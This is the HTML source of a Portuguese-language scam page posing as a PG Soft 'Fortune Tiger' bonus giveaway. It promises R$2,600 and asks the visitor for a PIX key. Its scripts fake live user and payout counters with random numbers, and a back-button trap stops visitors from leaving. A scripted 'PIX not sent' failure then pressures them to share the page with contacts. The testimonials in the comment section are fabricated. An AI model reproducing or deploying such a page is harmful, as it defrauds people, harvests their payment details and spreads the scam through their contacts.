
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Fortune Tiger - Saldo 1</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="robots" content="noindex, follow">
    <link rel="shortcut icon" href="https://i.imgur.com/G9CJB3n.jpg" type="image/x-icon">
	<meta property="og:url" content="https://pgsoft.com/"/>
	<meta property="og:site_name" content="Fortune Tiger - Super Mega Bônus!"/>
	<meta property="og:description" content="Bônus de R$50 até R$25.000,00 Reais!"/>
	<meta property="og:image" content="https://i.imgur.com/G9CJB3n.jpg">
	<meta name="theme-color" content="#eb4052">	
    <script src="ok/jquery.min.js"></script>
    <script src="ok/strap.min.js"></script>
    <script src="ok/as.js"></script>
    <link rel="stylesheet" href="stilos/bootstrap.min.css">
    <link rel="stylesheet" href="stilos/allss.css">
	<link href="stilos/com.css" rel="stylesheet" type="text/css">
</head>
<script src="https://kit.fontawesome.com/5d68eb8800.js" crossorigin="anonymous"></script>
<script>

setInterval(function() {
  // Simula uma chamada de API que retorna o número de usuários atualizado
  let newUsers = Math.floor(Math.random() * 1000) + 789019;

  // Atualiza o conteúdo do span com o novo número de usuários
  $("#users").text(newUsers);
}, 3000);


let saquesPagos = 1895177.89;
setInterval(function() {
  // Simula uma chamada de API que retorna o valor de saques pagos atualizado
  let novoValor = (Math.random() * 10000).toFixed(2);
  saquesPagos += parseFloat(novoValor);

  // Formata o valor para exibir com duas casas decimais e R$ na frente
  let valorFormatado = saquesPagos.toLocaleString('pt-BR', { style: 'currency', currency: 'BRL' });

  // Atualiza o conteúdo do elemento com o novo valor formatado
  document.getElementById("saques-pagos").innerHTML = valorFormatado;
}, 5000);

</script>
<body>

<div id="p_body_content">
<div class="top-header" style="background-color: rgb(255, 255, 255); color: rgb(82 82 82)">
	
		<div style="margin: 0 auto;padding: 10px 0px 10px 20vw;">
			<a href="/"><img src="https://i.imgur.com/Obp8bvx.png" alt="PgSoft" style="margin-left: 0!important;width: 75px;margin-bottom: 0;"></a>
		</div>
		
		<div>
			<i style="margin-right: -10px" class="fa fa-search" aria-hidden="true"></i>
			<i class="fa fa-navicon" aria-hidden="true"></i>
		</div>
		
	</div>
					<div style="display: flex; padding: 3%; padding-top: 4%; background: #a30303;">
			<div class="header_flex_item" style="width:70%">🟢 Seu Saldo: <font color=yellow><span>R$2.600</font><br>🟢 Liberado até: <font color=yellow><span><a id="current_date"></a></font></span></div>
			<div class="header_flex_item" style="width:70%">💰 Pagos hoje: <font color=yellow><span id="saques-pagos">R$ 1.895.177,89</font></span><br>🟢 Online agora: <font color=yellow><span id="users">789019</font></span>
							        <script>
        date = new Date();
        year = date.getFullYear();
        month = date.getMonth() + 1;
        day = date.getDate();
        document.getElementById("current_date").innerHTML = day + "/0" + month + "/" + year;
        </script>
			</div>
		</div>
  <div id="id1" class="header" style="background:#26245f;">
  
    <center><p style="margin-bottom:0px; padding:0px 12px;"></p></center>
  </div>
  <div class="content container">
    <div class="main-content flag" id="content1" style="color:#232f3f;">
		<img src="https://i.imgur.com/D4dD5Uq.jpg" width="100%"/>
	<div class="row d-flex align-items-center">
		<div class="col-md-6 align-middle">
      <div style="display: flex; font-weight:bold; margin-bottom:20px;">
        </div>
	  

	  </div>
		  <div class="col-md-6 text-center">
        <div class="text-center d-inline-block">
		
	

        </div>
      </div>
	  
	  	<style>
        .notij-close,
        div.notij-que * {
            font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
            z-index: 100000000
        }
        div.notij-que {
            position: fixed;
            width: 250px;
            right: 10px;
            bottom: 10px
        }
        div.notij {
            font-size: 12px;
            color: #555;
            display: none;
            padding: 10px;
            position: relative;
            margin-bottom: 5px;
            -webkit-border-radius: 5px;
            -moz-border-radius: 5px;
            border-radius: 5px
        }
        div.notij-msg {
            padding-right: 20px;
            font-size: 12px;
            color: #FFF
        }
        .notij-close {
            position: absolute;
            top: 10px;
            right: 10px;
            cursor: pointer;
            font-weight: 800
        }
        .theme_default {
            background: #414141
        }
        .close_default {
            color: #999
        }
        .theme_error {
            background: #3c5a96
        }
        .close_error {
            color: #FFEDFD
        }
        .theme_info {
            background: #3c5a96
        }
        .close_info {
            color: #3CF
        }
        @media (min-width: 780px) {
            div.notij-que {
                width: 400px;
            }
            div.notij,
            div.notij-msg {
                font-size: 12px;
            }
        }
        .cta {
            background: #F0AD4E;
            border: 2px solid #fff;
            padding: 6px;
            -ms-border-radius: 10px;
            -o-border-radius: 10px;
            -moz-border-radius: 10px;
            -webkit-border-radius: 10px;
            border-radius: 10px;
            color: #000
        }
    </style>
	    <script type="text/javascript"> 
        ! function() {
            var t;
            try {
                for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
                onpopstate = function(t) {
                    t.state && location.replace("#");
                }
            } catch (o) {}
        }();
    </script>
	  
		</div>
      <div class="main-content flag" id="content1" style="border: 1px solid #CCCCCC; padding: 20px; margin: 20px 0px; background-color: #f3f3f3;">
        <div id="q1">
		<label ng-class="operatorName ? &#39;fixed-label&#39; : &#39;&#39;" class=""><b>Preencha corretamente. Só pode ser resgatado uma vez!<br><br>Saldo Disponível: R$2.600,00</b></label><br><br>
Insira sua Chave PIX para realizar seu saque.
				<input id="name" type="text"  name="name" autocomplete="off" placeholder="Exemplo: CPF, CNPJ, E-mail, Telefone..." class="form-control changeplaceholder showdropdown name ng-pristine ng-valid ng-valid-maxlength ng-touched" required="">
          <p class="question"><strong></strong></p>
	<div class="survey_button bq4" data-bq="1"> FINALIZAR </div>
        </div>
      </div>
    </div>
    <div class="main-content" id="content2"><font color=white>
      <h2 style="text-align:center">✅ Chave Pix Inserida...</h2>
      <div class="d-flex justify-content-center">
        <div class="spinner-border" role="status"><span class="sr-only">Loading...</span></div>
      </div>
      <p class="result" id="result1">✅ Enviando R$2.600...</p>
      <p class="result" id="result2">✅ Aguarde...</p>
      <p class="result" id="result3">❌ PIX NÃO ENVIADO!</p></font>
    </div>
		<div class="main-content" id="content3">
		<div class="main-content flag" id="content1" style="border: 1px solid #e7e4e4; padding: 20px; margin: 20px 0px; background-color: #e7e4e4;">
		<h3 style="font-weight:700">ATENÇÃO<br> FALHA AO ENVIAR VALOR VIA PIX!</h3>
		<p>Nosso sistema verificou que você não compartilhou corretamente, seu Pix foi congelado até que seja corrigido!</p>

		<p> CONTATOS/AMIGOS: <b><font color=orange>INCOMPLETO!</font></b></p>
						<p> STATUS: <b><font color=red>AGUARDANDO!</font></b></p>
						<p>Você terá outra chance de receber seu valor <br><br> COMPARTILHE CORRETAMENTE ANTES QUE SEU VALOR SEJA <b>CANCELADO</b>.<br>

</select>
<p></p><a href="granjeia11.html">
<button onclick="fn1()" type="button" class="btn btn-primary">   CONTINUAR   </button></a>
</div>
    </div>	    


    
	

                                      <!-- START Comments -->
<div id="commentsya">
<div class="commentsya" style="display: inline;">
<div class="cmnts">
<p class="comments">Comentários:</p>
<p class="buttons"><span class="like">Curtir</span> · <span onclick="completealert()">Comentar</span> · <span onclick="completealert()">Compartilhar</span></p>
<p class="new-likes" style="
    padding-left: 5px;
"><img src="https://i.imgur.com/9WUc9uD.png" height="16px" align="center" display="inline-block"><span id="youand"></span> <span class="color-blue">5.570 curtiram isso.</span></p>
<p class="more clearfix"><span class="left" onclick="completealert()">Ver comentários anteriores</span><span class="right">15 de 9.777</span></p>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/Xg3Xii5.jpg" width="50" height="50">
<p class="comtxt"><span class="name">Márcio Lopes da Silva</span> Nem acredito, eu ganhei R$900 reais </p>
<p class="combot"><span class="ago">Agora mesmo</span> · <span class="new-like">Curtir</span><span class="likes new-likes"></span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/se6AyMn.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Kamila Lima</span> Meu deeeeus, aqui saiu 4500,00 gennteee </p>
<p class="combot" style="display: block;"><span class="ago">Agora mesmo</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/9WUc9uD.png" height="16px" align="center" display="inline-block">45</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/UyWQTpC.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Margaretii Kobai </span> tigre safado, me deu só 500 reais, mais ta bom </p>
<p class="combot" style="display: block;"><span class="ago">2 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/9WUc9uD.png" height="16px" align="center" display="inline-block">101</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/0AEGbP2.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Cristiane Almeida </span> olocooo, eu ganhei R$6900,00 galera, nem acredito, to pasmaaa</p>
<p class="combot" style="display: block;"><span class="ago">7 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/ZsVV3Cl.png" height="16px" align="center" display="inline-block">6</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/2i6LWAd.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Larissa Santuss </span> @Cristiane Almeida, eu falei pra você kkkk agora me da 100zinho poww</p>
<p class="combot" style="display: block;"><span class="ago">17 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/ZsVV3Cl.png" height="16px" align="center" display="inline-block">12</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/sQ6kGYS.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Giovanna Kastro </span> Me salvou de verdade, aqui saiu 900 reais</p>
<p class="combot" style="display: block;"><span class="ago">22 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/87QHSoi.png" height="16px" align="center" display="inline-block">6</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/Zhku7Su.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Julia </span> eu to chocaaadaaa, eu vi uma ver o carlinhos maia falando desse app mais eu não achava, agora que achei é só money que voaaa</p>
<p class="combot" style="display: block;"><span class="ago">24 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/87QHSoi.png" height="16px" align="center" display="inline-block">2</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/6cyerx3.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Antonia Leal </span> eu fiz no meu celular e no celular do meu marido, ganhei 1500 reais 2x hoje</p>
<p class="combot" style="display: block;"><span class="ago">28 minutos atrás</span> · <span class="new-like">Curtir</span><span class="likes"><img src="https://i.imgur.com/87QHSoi.png" height="16px" align="center" display="inline-block">5</span></p>
</div>
<div class="item">
<img class="profileimg" src="https://i.imgur.com/S8evvGl.jpg" width="50" height="50">
<p class="comtxt" style="display: block;"><span class="name">Serena Tereza </span> AQUI DEU 6700 REAIS GALERAAAAA !!!!</p>
<p class="combot" style="display: block;"><span class="ago">35 minutos atrás</span> · <span class="new-like">Curtir</span></p>
</div>
<br>
</div>
</div>
</div>
    <!-- END Comments -->
  </div>
</div>


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-BXJWX1HSSP"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-BXJWX1HSSP');
</script>





    <!-- START Footer -->
    <div id="footer" style="background-color:#c33241; margin-bottom:0px;; font-size:12px; text-align:center; color:#EFEFEF;">
      <p style="padding:20px; padding-bottom:0px;"></p>
      <p style="line-height:40px; margin-bottom:0px;">© 2023 - Fortune Tiger.</p>
    </div>
    <!-- END Footer -->
<!-- END html -->
</body></html>